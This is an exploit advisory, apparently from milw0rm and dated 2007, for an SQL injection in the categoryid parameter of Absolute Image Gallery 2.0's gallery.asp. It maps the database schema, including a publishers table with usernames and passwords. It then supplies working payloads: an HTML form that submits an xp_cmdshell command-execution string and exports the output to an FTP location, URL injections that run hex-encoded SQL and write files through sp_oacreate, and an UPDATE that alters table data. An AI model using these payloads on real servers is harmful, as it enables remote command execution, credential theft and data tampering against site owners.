250 lines
No EOL
6.7 KiB
Text
250 lines
No EOL
6.7 KiB
Text
Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit
|
||
|
||
Type :
|
||
|
||
SQL Injection
|
||
|
||
Release Date :
|
||
|
||
{2007-03-15}
|
||
|
||
Product / Vendor :
|
||
|
||
Absolute Image Gallery
|
||
|
||
http://www.xigla.com/absoluteig/
|
||
|
||
Bug :
|
||
|
||
http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Script Table/Colon Name :
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : articlefiles
|
||
|
||
fileid
|
||
filetitle
|
||
filename
|
||
articleid
|
||
filetype
|
||
filecomment
|
||
urlfile
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : articles
|
||
|
||
articleid
|
||
posted
|
||
lastupdate
|
||
headline
|
||
headlinedate
|
||
startdate
|
||
enddate
|
||
source
|
||
summary
|
||
articleurl
|
||
article
|
||
status
|
||
autoformat
|
||
publisherid
|
||
clicks
|
||
editor
|
||
relatedid
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : iArticlesZones
|
||
|
||
articleid
|
||
zoneid
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : plugins
|
||
|
||
pluginid
|
||
pplname
|
||
pplfile
|
||
ppldescription
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : PPL1reviews
|
||
|
||
reviewid
|
||
articleid
|
||
name
|
||
reviewdate
|
||
review
|
||
comments
|
||
isannonymous
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : publishers
|
||
|
||
publisherid
|
||
name
|
||
username
|
||
password
|
||
email
|
||
additional
|
||
plevel
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : publisherszones
|
||
|
||
publisherid
|
||
zoneid
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : xlaAIGcategories
|
||
|
||
categoryid
|
||
catname
|
||
catdesc
|
||
supercatid
|
||
lastupdate
|
||
catpath
|
||
images
|
||
allowupload
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : xlaAIGimages
|
||
|
||
imageid
|
||
imagename
|
||
imagedesc
|
||
imagefile
|
||
imagedate
|
||
imagesize
|
||
totalrating
|
||
totalreviews
|
||
hits
|
||
categoryid
|
||
status
|
||
uploadedby
|
||
additionalinfo
|
||
embedhtml
|
||
keywords
|
||
copyright
|
||
credit
|
||
source
|
||
datecreated
|
||
email
|
||
infourl
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : xlaAIGpostcards
|
||
|
||
dateposted
|
||
postcardid
|
||
imageid
|
||
bgcolor
|
||
bordercolor
|
||
fonttype
|
||
fontcolor
|
||
recipientname
|
||
recipientemail
|
||
greeting
|
||
bgsound
|
||
sendername
|
||
senderemail
|
||
sendermsg
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Table Name : zones
|
||
|
||
zonename
|
||
description
|
||
template
|
||
articlespz
|
||
zonefont
|
||
fontsize
|
||
fontcolor
|
||
showsource
|
||
showsummary
|
||
showdates
|
||
showtn
|
||
textalign
|
||
displayhoriz
|
||
cellcolor
|
||
targetframe
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
MSSQL CMD Injection Exploit(For DBO Users) :
|
||
|
||
<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>
|
||
<body bgcolor="#000000">
|
||
<form name="Form" method="get" action="http://localhost/script/gallery.asp">
|
||
<center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>
|
||
<center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center>
|
||
<center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center>
|
||
<tr>
|
||
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
|
||
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
|
||
<td> </td>
|
||
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
|
||
</tr>
|
||
<tr>
|
||
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
|
||
<td> </td>
|
||
<td>
|
||
<select name="">
|
||
<option value="0">(CMD)</option>
|
||
</select> <br><br>
|
||
<input type="submit" value="Apply"></center>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</form>
|
||
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
|
||
<br>
|
||
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
|
||
<br>
|
||
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Code Injection(For DBO Users) :
|
||
|
||
Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--
|
||
|
||
ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--
|
||
|
||
Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
UPDATE(ALL users) :
|
||
|
||
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--
|
||
|
||
---------------------------------------------------------------------------------------------------------------------------------------------
|
||
|
||
Tested :
|
||
|
||
Absolute Image Gallery 2.0
|
||
|
||
Vulnerable :
|
||
|
||
Absolute Image Gallery 2.0
|
||
|
||
Author :
|
||
|
||
UniquE-Key{UniquE-Cracker}
|
||
UniquE(at)UniquE-Key.Org
|
||
http://www.UniquE-Key.Org
|
||
|
||
# milw0rm.com [2007-03-15] |